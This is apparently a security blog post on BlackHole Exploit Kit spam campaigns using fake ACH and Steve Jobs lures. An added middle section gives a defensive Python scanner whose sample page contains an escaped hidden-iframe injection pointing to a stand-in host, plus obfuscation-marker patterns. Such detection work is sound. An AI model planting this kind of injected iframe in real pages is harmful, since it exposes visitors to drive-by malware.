Lately, we have been seeing a renewed increase in the volume of spam attacks that utilize an exploit kit, specifically the BlackHole Exploit Kit, to trigger a malicious payload. We have seen this in the latest slew of Automated Clearing House (ACH) spam attacks and in the more recent spam run related to Steve Jobs’s death.
In this post, we will reorient readers on the infection chain of such an attack to help them understand why basic mitigation practices are still effective and can help them protect themselves from today’s threats.
In a typical spam campaign that involves malware, cybercriminals lure users through social engineering to perform several actions before the intended payload gets executed. For example, a user needs to download, extract, and execute a supposedly “benign” file for a spam attack to succeed.
Spam campaigns that use exploit kits, however, are a bit more dangerous since these only need to lure the users into clicking a malicious link for the rest of the infection to take place.
Below is an example of this type of spam, supposedly from the National Automated Clearing House Association (NACHA). NACHA manages the ACH network, which facilitates bulk payment transactions involving businesses, governments, and consumers. The users most likely to receive email from NACHA are those who conduct transactions related to payroll, government benefits, tax refunds, and the like, which is what makes the lure plausible.
When the obfuscated script is decoded, we can see that it attempts to embed an iframe pointing to another malicious site, which hosts the BlackHole Exploit Kit:
Once the iframe is loaded, content is pulled in from the BlackHole Exploit Kit site, which again contains a highly obfuscated script. Decoding that script reveals the actual code that checks the visitor’s software for vulnerable versions and serves the matching exploits.
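To make the first obfuscation layer above concrete from the defender’s side, here is an added example (not code from the original post): a small Python scanner that statically decodes `unescape("...")` strings in page scripts and flags hidden iframes, including ones that only exist after decoding and so are invisible to a plain markup scan. The sample page and the `example.invalid` URL are constructed for illustration; the decoder handles `%XX` escapes only, not JavaScript’s `%uXXXX` form.

```python
import re
from urllib.parse import unquote
# Constructed sample (not from a real campaign): the only iframe lives inside an escaped string.
SAMPLE_PAGE = """<html><body>
<p>Your ACH transaction was rejected. Please review the report below.</p>
<script>
var s = unescape("%3Ciframe%20src%3D%22http%3A//example.invalid/landing.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E");
document.write(s);
</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']([^"']+)["']\s*\)""")
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode(", "document.write(")

def decode_unescape_args(script):
    # Static decoding of unescape("...") arguments; the script is never executed.
    return [unquote(arg) for arg in UNESCAPE_RE.findall(script)]

def is_hidden(attrs):
    # 1x1 / 0x0 frames or inline-style hiding are the classic injection tells.
    for key in ("width", "height"):
        size = attrs.get(key, "").lower().rstrip("px")
        if size.isdigit() and int(size) <= 1:
            return True
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    return "visibility:hidden" in style or "display:none" in style

def suspicious_iframes(markup):
    # Return src URLs of hidden iframes present in a piece of markup.
    hits = []
    for raw in IFRAME_RE.findall(markup):
        attrs = {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
                 for m in ATTR_RE.finditer(raw)}
        if attrs.get("src") and is_hidden(attrs):
            hits.append(attrs["src"])
    return hits

def scan_page(html):
    # Combine a static iframe scan with a decode pass over obfuscated scripts.
    findings = [("hidden_iframe", src) for src in suspicious_iframes(html)]
    for script in SCRIPT_RE.findall(html):
        markers = [m for m in OBFUSCATION_MARKERS if m in script]
        if markers:
            findings.append(("obfuscated_script", ",".join(markers)))
        for decoded in decode_unescape_args(script):
            for src in suspicious_iframes(decoded):
                findings.append(("hidden_iframe_from_script", src))
    return findings
```

Running `scan_page(SAMPLE_PAGE)` reports the obfuscation markers and the decoded hidden iframe, while `suspicious_iframes(SAMPLE_PAGE)` alone returns nothing, which is exactly why the static view of such a page looks clean.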
The BlackHole Exploit Kit exploits vulnerabilities both in third-party applications such as Adobe Acrobat, Flash Player, and Java and in Windows components such as Microsoft Data Access Components (MDAC) and the Help and Support Center (HCP).
Successful exploitation executes shellcode that triggers the download and execution of malware. We observed that these attacks have been used to spread ZeuS variants, although they may also be used to spread other malware.
As a reminder to users, here are some ways to prevent this kind of threat from affecting their systems:
- Be aware of social engineering attacks. The majority of online attacks today rely on social engineering before any technical infection payload comes into play. Being wary of what you do online mitigates many infections at the outset. Simple common sense, such as not entertaining unsolicited email, can go a long way in keeping your personal information safe online.
- Always check for malicious links. Check what URLs actually point to before following them. It is also good practice to type or paste a URL into your browser’s address bar instead of clicking links directly.
- Always remember to patch. The BlackHole Exploit Kit utilizes exploits that affect old, unpatched versions of software. The persistence of such tools means that old exploits are still able to infect many users. No matter how inconvenient it may be, regularly patching your software is still an important mitigation step.
The state of the threat landscape and the general public’s overwhelming reliance on the Internet demand that users stay aware of the kinds of threats found online as well as of the ways to protect themselves. Knowing how attacks such as these work, users gain an advantage over attackers and can stop threats before they even reach their systems. A little self-education can ultimately make the Internet a better and safer place to be.
More information on how cybercriminals utilize spam in malicious schemes can be found in our recently released security focus report, “Spam in Today’s Business World.”